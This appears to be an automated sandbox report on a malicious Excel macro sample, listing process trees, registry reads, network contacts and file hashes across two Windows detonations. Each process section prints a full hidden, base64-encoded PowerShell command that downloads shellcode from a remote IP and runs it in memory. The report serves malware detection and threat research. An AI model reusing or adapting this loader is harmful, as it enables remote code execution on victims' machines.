Malware Analysis Report

2024-12-07 15:15

Sample ID 241113-1rzjlszgkn
Target 21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d
SHA256 21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d
Tags
discovery execution macro macro_on_action
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d

Threat Level: Known bad

The file 21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d was found to be: Known bad.

Malicious Activity Summary

discovery execution macro macro_on_action

Process spawned unexpected child process

Office macro that triggers on suspicious action

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 21:53

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 21:53

Reported

2024-11-13 21:54

Platform

win7-20240903-en

Max time kernel

14s

Max time network

17s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1940 wrote to memory of 2652 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2652 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2652 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1940 wrote to memory of 2652 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2652 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2652 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2652 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2652 wrote to memory of 2780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2780 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2780 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2780 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2780 wrote to memory of 2740 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rt5ex9jx.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESED0E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCED0D.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 tcp

Files

memory/1940-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1940-1-0x000000007228D000-0x0000000072298000-memory.dmp

memory/1940-8-0x0000000006D10000-0x0000000006E10000-memory.dmp

memory/1940-9-0x0000000006D10000-0x0000000006E10000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\rt5ex9jx.cmdline

MD5 5224a75f4a6fc2aca0f78d88792f5e67
SHA1 86290a0513101f9c93bb4f834d159fbfb644e953
SHA256 0c9b831ccbeadc8735b08cc21dfeb80ed4b583b276e499acfc76693a06091c97
SHA512 bf32cacad5fcc85371d60eda12d0d66f77f6da04ca44de00df1cdab73b312ed3a57cdd1dc567963c4d5877b5f0b4f8e4d53e02baca9214d082b3a39d4fbab37a

\??\c:\Users\Admin\AppData\Local\Temp\rt5ex9jx.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

C:\Users\Admin\AppData\Local\Temp\RESED0E.tmp

MD5 b6f9a92cac35d099ab0a5c70f160f37b
SHA1 c381b8084a9a0c8b886a53f8d38cab5fa10ad7ad
SHA256 7d87b3e58995fe296ab1b5c0db186e11af69a156ceef3979aef2e3187b51a8f1
SHA512 8bd324a527d8715d069df35e817e4dc486d3571c99e6143a73ee4a3a6eae5c1740d6e3534a01735bf1bbc6869e2d1d9c6bdac1fe36ad116e1a4d7f437d0658aa

\??\c:\Users\Admin\AppData\Local\Temp\CSCED0D.tmp

MD5 bc789aa4ff0d6aef91aefee8858f3a83
SHA1 934418e7c967358e169b627ebf809f8f1b2dd758
SHA256 7186d42a9eb4d1e0cf76629f8a7864c231cc885a81f42b2ea96176f9d114eed2
SHA512 afc86832b3a364c4ea6685acaba96a848c3caf8aa77e601a271ce1a9e6e8fc3962f5b2d0336490ed882789c14054295ce19e740378eae1d566dec761b450ae27

C:\Users\Admin\AppData\Local\Temp\rt5ex9jx.dll

MD5 016c88ea0b267e968d2bc6e836012c12
SHA1 852ef0ef5e414b45c27b6f74689ad5d2bbcb6dc0
SHA256 3c8b4fb27e144b477b07c182509e0012e217590e6c4b4072e80effaeb37e4611
SHA512 ca1feef8588c0deff1fbbaac7fbf318686031181e1e98e9c7381cb93f73158df3ee847980856570a87d5f2e7dce5d44f7ffb0d330686c98c24808c0f597ad92e

C:\Users\Admin\AppData\Local\Temp\rt5ex9jx.pdb

MD5 ae7f5867fa505e4f94486f6871be4df7
SHA1 e2e3bb9e86f37b9657650e0b5d64e0a1c27df1ea
SHA256 13d52689ed65ce7f1fb77c4734dd8f5fc3417b19159501973263885df2f535a6
SHA512 ae73a096144cb0967801f8be1f2732ac3e28693dd2bc51ce428a709b3ae530eef3730152924a193f1976cbd55f1fbce4ac5865394a4d55499f8efcd4f3c0f6f1

memory/1940-27-0x000000007228D000-0x0000000072298000-memory.dmp

memory/1940-28-0x0000000006D10000-0x0000000006E10000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 21:53

Reported

2024-11-13 21:54

Platform

win10v2004-20241007-en

Max time kernel

34s

Max time network

39s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\21082cd4feb0b0677431cba4e50e79f3d286e607a612426c939d2ffd68f40d7d.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kznoktjg\kznoktjg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1AA.tmp" "c:\Users\Admin\AppData\Local\Temp\kznoktjg\CSCED97D26999C74B27BCE341846D169867.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
CH 194.182.164.149:8080 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp

Files

memory/4836-3-0x00007FFB27C10000-0x00007FFB27C20000-memory.dmp

memory/4836-4-0x00007FFB27C10000-0x00007FFB27C20000-memory.dmp

memory/4836-2-0x00007FFB27C10000-0x00007FFB27C20000-memory.dmp

memory/4836-5-0x00007FFB27C10000-0x00007FFB27C20000-memory.dmp

memory/4836-1-0x00007FFB67C2D000-0x00007FFB67C2E000-memory.dmp

memory/4836-0-0x00007FFB27C10000-0x00007FFB27C20000-memory.dmp

memory/4836-7-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-6-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-9-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-8-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-10-0x00007FFB25720000-0x00007FFB25730000-memory.dmp

memory/4836-11-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-12-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-13-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-14-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-15-0x00007FFB25720000-0x00007FFB25730000-memory.dmp

memory/4836-17-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-18-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-19-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-20-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-16-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-32-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

memory/4836-33-0x00007FFB67B90000-0x00007FFB67D85000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lmxirxwt.jam.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1760-45-0x0000025BAF100000-0x0000025BAF122000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\kznoktjg\kznoktjg.cmdline

MD5 cf0f41cd3c228b2136aa426510deba19
SHA1 2b3efd51d5b5bf7ceb9ab331e9d67ff4b2947832
SHA256 96136a50e603af06e23b4739cff3196c3827e9de49bc9bb2541607f851cacadd
SHA512 ece5b4e0fc456e964a94d26b4ad38ad0bd61d2e63d09a8bf16f6ab1aaf04f775adc7816b65039f30cc6bd3edb26cff6acba4b7643b75ed38f6132eb646150e24

\??\c:\Users\Admin\AppData\Local\Temp\kznoktjg\kznoktjg.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
